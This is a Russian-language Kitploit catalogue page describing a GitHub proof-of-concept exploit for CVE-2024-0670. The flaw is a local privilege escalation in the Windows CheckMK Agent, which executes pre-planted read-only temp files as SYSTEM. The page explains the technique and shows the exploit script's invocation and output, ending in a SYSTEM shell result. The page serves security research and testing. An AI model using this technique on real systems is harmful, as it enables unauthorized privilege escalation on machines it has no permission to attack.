Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-0670 — PoC для CVE-2024-0670 | Kitploit
Инструменты/GitHubGitHub/magicrc/cve-2024-0670
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и Образование
GitHubmagicrc/cve-2024-0670

CVE-2024-0670

PoC для CVE-2024-0670

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2024-0670 PoC

Этот репозиторий предоставляет доказательство концепции (PoC) эксплойта для уязвимости CVE-2024-0670, затрагивающей CheckMK Agent на системах Windows. Уязвимость возникает, когда CheckMK Agent создаёт и выполняет временные файлы в каталоге C:\Windows\Temp. Злоумышленник может воспользоваться этим поведением, заранее разместив вредоносные файлы в этом каталоге с защитой от записи. Когда агент пытается создать временный файл, который уже существует и доступен только для чтения, ему не удаётся перезаписать его, но он всё равно выполняет существующий файл с привилегиями SYSTEM, что позволяет повысить привилегии.

Ссылка на бюллетень: SEC Consult — Локальное повышение привилегий через записываемые файлы в Checkmk Agent


⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Этот проект предназначен только для образовательных, исследовательских целей и авторизованного тестирования безопасности.
Не используйте этот код на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Автор не несёт ответственности за любой ущерб или неправомерное использование.


Использование

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"

Пример

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer... 
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
Скачать инструмент